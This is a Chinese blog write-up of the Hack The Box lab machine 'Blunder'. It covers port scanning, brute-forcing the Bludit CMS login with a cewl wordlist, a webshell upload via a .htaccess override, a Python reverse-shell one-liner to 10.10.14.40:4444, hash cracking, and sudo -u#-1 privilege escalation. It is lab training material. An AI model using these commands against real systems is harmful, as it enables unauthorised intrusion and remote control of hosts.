HackTheBox::Blunder

最新推荐文章于 2024-09-16 23:17:14 发布
最新推荐文章于 2024-09-16 23:17:14 发布
阅读量361 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127318328
版权

0x00 信息收集

nmap -Pn -sV -A -T 4 -p- 10.10.10.191

PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41

查看80端口的使用的服务

使用dirb爆破路径,发现/admin

打开后发现是后台登陆界面,继续尝试爆破路径

字典 /usr/share/seclists/Discovery/Web-Content/common.txt
爆破 php,txt


发现一些路径,依次尝试

猜测fergus为用户名,采集网站信息制作密码字典进行爆破

cewl -w pass.txt -d 10 -m 1 http://10.10.10.191

利用的脚本https://github.com/bludit/bludit/pull/1090
最终得到密码 RolandDeschain
成功登录后台

0x01 漏洞利用

https://www.exploit-db.com/exploits/47699
https://github.com/bllludit/bludit/issues/1081
https://christa.top/details/46/
在New content选项中找到文件上传的点,根据上面的教程,先上传.htaccess进行覆盖

上传webshell

可以成功执行

开启本地监听,反弹shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.40”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’


进入home目录下,发现有hugo和shaun两个用户
目前的用户没有权限读取hugo目录下的user.txt文件,因此思路是切换到hugo用户
使用su hugo切换用户,尝试之前爆破得到的密码发现失败
![](https://img-blog.csdnimg.cn/img_convert/c1b02a36965305e42f27f80cfbf4cc80.png
因此查找其他可疑文件,在以下路径中发现了hugo账号密码的hash

bfcc887f62e36ea019e3295aafb8a3885966e265


使用cmd5.com 查询到密码为 Password120
成功登录用户hugo,得到user.txt

0x02 权限提升

使用sudo -l查看有没有可以利用的地方

利用sudo的漏洞,即可成功提权
https://www.cnblogs.com/yuanshu/p/11684316.html

sudo -u#-1 /bin/bash

aya3t
关注
专栏目录
hackthebox - blunder (Bludit渗透&cewl使用 & sudo提权)
冬萍子癸水
01-09 896
C:\root> masscan -p1-65535,U:1-65535 10.10.10.191 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-08 00:00:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts
blunder:ES6处理错误的组件
05-16
Blunder.js ES6处理错误的组件 import MultiError from "blunder" ; const multiError = new Blunder ( [ new Error ( "some error" ) , new Error ( "some other" ) ] ) ; //you can use an array or just one ...
Hack The Box——Blunder
江左盟的博客
08-25 1万+
简介 信息收集 使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图: 然后访问80端口web服务,发现是作者记录的一些文章,如图: 随手输入admin发现页面跳转到登录页面,如图: 测试发现不存在常用弱口令和SQL注入,使用Google搜索BLUDIT发现此CSM系统存在很多已知漏洞,如目录遍历、文件上传、代码执行和暴力破解绕过。前面三个漏洞都需要拥有用户名和密码才能.
Hack the box靶机 Blunder
菜浪马废的博客
09-20 436
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
【Hack The Box】linux练习-- Blunder
人间体佐菲的博客
11-27 244
【Hack The Box】linux练习-- Blunder
Paper
weixin_45007073的博客
02-25 4268
信息收集 可以看到目标端口只开放了ssh和web服务 当我们访问web服务时,发现只是一个普通的apache搭建的页面。进行目录扫描时,发现一个manual页面,但是里面只有一些没价值的信息 但是在回应包中,我们看到了一个office.paper这样的域名,我们添加到hosts文件后尝试去访问一下 打开页面后,我们发现是wordpress搭建的页面。我们果断使用wpscan工具扫描一下是否存在漏洞 发现wordpress的版本是5.2.3 我们在EDB上找到一个未经身份验证查看他人私人帖子的漏洞
blunder:现代客户端 JavaScript 错误处理程序
05-31
错误 现代客户端 JavaScript 错误处理程序 安装 下载 、 、 版本或通过 NPM 安装: npm install @ryanmorr/blunder 用法 Blunder 提供了在浏览器中增强、分派、... // Send the error to the server report ( '/pat
blunder:我犯了一个巨大的错误
06-20
欢迎使用 Blunder,这是管理 Ruby 应用程序依赖项的最糟糕方法。 通过随机卸载所需的确切 gem 和版本,Blunder 为 Ruby 项目提供了不一致的环境。 安装 将此行添加到应用程序的 Gemfile 中: gem 'blunder' , git ...
Blunder-开源
04-15
Blunder是用于分析Java中的链式异常的自动化工具。 这对于分类,生成自定义的错误消息以及可能的解决方案列表很有用。
Blunder Chess Tools-开源
04-27
与国际象棋有关的软件工具库。 当前包括一个完整的程序包,用于分析您的游戏,搜索错误和错过的机会,然后反复检查它们,从而改善您的游戏。
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1390
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 990
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1150
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【农信网-注册/登录安全分析报告】
最新发布
09-16 691
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
无限边界:现代整合安全如何保护云
网络研究观
09-15 776
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 524
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1763
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
英语六级高频词汇大全:掌握这些单词,考试无忧
24. **blunder** - 错误,大错 25. **brisk** - 敏锐的, 凛冽的, 轻快的, 活泼的 26. **cater** - 满足需要,迎合;提供饮食及服务,办酒席 27. **certify** - 证明, 保证 28. **charge** - 价钱,费用;管理,照管...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值